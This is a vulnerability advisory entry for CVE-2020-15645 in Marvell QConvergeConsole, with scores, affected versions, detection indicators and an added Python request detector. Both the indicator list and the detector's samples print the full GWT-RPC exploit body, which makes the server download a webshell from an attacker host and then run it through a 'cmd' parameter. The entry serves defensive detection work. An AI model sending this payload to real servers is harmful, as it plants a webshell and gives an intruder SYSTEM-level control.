CVE-2020-15645
Published 2020-08-25
Priority: P2 (67). CVSS 3.1: 8.8 (high), vector AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS: 10.68% (95.3rd percentile)
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Marvell QConvergeConsole 5.5.0.64. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the getFileFromURL method of the GWTTestServiceImpl class. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-10553.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| marvell | qconvergeconsole | < 5.5.00.73 | 5.5.00.73 |
| marvell | qconvergeconsole | — | — |
Detection & IOCs (extracted from sources)
- Command (GWT-RPC request body used by the exploit): `7|0|7|http://:8080/QConvergeConsole/com.qlogic.qms.hba.gwt.Main/|serialization_policy|com.qlogic.qms.hba.gwt.client.GWTTestService|getFileFromURL|java.lang.String/2004016611|Z|http://:8000/webshell.jsp|1|2|3|4|2|5|6|7|0|`
- Detect HTTP POST requests to the GWT RPC endpoint /QConvergeConsole/com.qlogic.qms.hba.gwt.Main/gwttestservice with Content-Type 'text/x-gwt-rpc' containing the string 'getFileFromURL' in the body, indicating exploitation of CVE-2020-15645.
- Alert on HTTP GET requests to /QConvergeConsole/webshell.jsp with a 'cmd' query parameter, indicating post-exploitation webshell execution.
- Monitor for the creation of .jsp files in the QConvergeConsole web application context path (e.g., the QCCAgentInstallers directory), which may indicate a malicious JSP webshell was uploaded via the getFileFromURL method.
- The exploit bypasses the flawed URL restriction: the vulnerable code blocks URLs containing 'download.qlogic.com' instead of allowing only that domain, so any attacker-controlled URL not containing that string will be accepted.
- Detect GWT RPC payloads referencing 'com.qlogic.qms.hba.gwt.client.GWTTestService' with method 'getFileFromURL' or 'deleteAppFile' in HTTP POST bodies to the gwttestservice endpoint.
- Process execution as 'nt authority\system' spawned from the QConvergeConsole web application process may indicate successful webshell execution following exploitation.
- The vulnerable getFileFromURL method contains a logic inversion: it blocks URLs containing 'download.qlogic.com' rather than restricting to only that domain, meaning any external attacker-controlled URL is accepted. Detection rules should not rely on the presence of 'download.qlogic.com' in the request body as an indicator of benign traffic.
- Authentication is required to exploit this vulnerability, but the existing authentication mechanism can be bypassed, meaning standard authenticated-only network controls are insufficient to prevent exploitation.
- Successful exploitation results in code execution as SYSTEM (Windows) or root (Linux), so any process or file activity from the QConvergeConsole service account should be treated as high-severity.
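The network and file indicators listed above, turned into a small detector and run over constructed sample requests. This is an added example, not code from the advisory, Marvell or any vendor; the JSP rule generalizes the single webshell.jsp indicator to any .jsp under the application path with a 'cmd' parameter, and the install path and the non-file method name in the samples are placeholders.

```python
from urllib.parse import parse_qs, urlsplit

GWT_RPC_ENDPOINT = "/QConvergeConsole/com.qlogic.qms.hba.gwt.Main/gwttestservice"
GWT_SERVICE = "com.qlogic.qms.hba.gwt.client.GWTTestService"
SUSPECT_METHODS = ("getFileFromURL", "deleteAppFile")
WEBAPP_PREFIX = "/QConvergeConsole/"


def classify_request(method, target, headers, body):
    """Return detection labels for one HTTP request; an empty list means no match."""
    labels = []
    url = urlsplit(target)
    ctype = {k.lower(): v for k, v in headers.items()}.get("content-type", "").lower()
    # Rule 1: GWT-RPC POST to the test service naming one of the file-handling methods.
    if (method == "POST" and url.path == GWT_RPC_ENDPOINT
            and ctype.startswith("text/x-gwt-rpc")
            and GWT_SERVICE in body
            and any(m in body for m in SUSPECT_METHODS)):
        labels.append("gwt-rpc-file-method")
    # Rule 2: GET of any .jsp under the web app carrying a 'cmd' query parameter
    # (generalizes the /QConvergeConsole/webshell.jsp indicator to other file names).
    query = parse_qs(url.query, keep_blank_values=True)
    if (method == "GET" and url.path.startswith(WEBAPP_PREFIX)
            and url.path.lower().endswith(".jsp") and "cmd" in query):
        labels.append("jsp-cmd-parameter")
    return labels


def is_suspicious_jsp_write(path):
    """File-creation rule: a new .jsp anywhere inside the QConvergeConsole application tree."""
    p = path.replace("\\", "/").lower()
    return "/qconvergeconsole/" in p and p.endswith(".jsp")


# Constructed sample traffic modelled on the indicators above; not captured data.
GWT_HEADERS = {"Content-Type": "text/x-gwt-rpc; charset=utf-8"}
SAMPLE_REQUESTS = [
    ("POST", GWT_RPC_ENDPOINT, GWT_HEADERS,
     "7|0|7|http://:8080/QConvergeConsole/com.qlogic.qms.hba.gwt.Main/|serialization_policy|"
     + GWT_SERVICE + "|getFileFromURL|java.lang.String/2004016611|Z|"
     "http://:8000/webshell.jsp|1|2|3|4|2|5|6|7|0|"),
    ("GET", "/QConvergeConsole/webshell.jsp?cmd=example", {}, ""),
    ("POST", GWT_RPC_ENDPOINT, GWT_HEADERS,  # same service, non-file method (placeholder name)
     "7|0|3|" + GWT_SERVICE + "|otherMethodPlaceholder|Z|1|2|3|0|"),
    ("GET", "/QConvergeConsole/", {}, ""),
]


def scan(requests):
    """Map each request's index to its labels, keeping only requests that matched."""
    results = {i: classify_request(*r) for i, r in enumerate(requests)}
    return {i: labels for i, labels in results.items() if labels}
```

Feed `classify_request` the method, request target, header dict and body of each request from your proxy or web-server log; `scan(SAMPLE_REQUESTS)` flags only the first two samples.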
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | 3.0 | 8.8 | HIGH | CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 9.0 | CRITICAL | AV:N/AC:L/Au:S/C:C/I:C/A:C |
No detection rules found.
No public exploits indexed.
References
- https://www.marvell.com/content/dam/marvell/en/public-collateral/fibre-channel/marvell-fibre-channel-security-advisory-2020-07.pdf
- https://www.tenable.com/security/research/tra-2020-56
- https://www.zerodayinitiative.com/advisories/ZDI-20-973/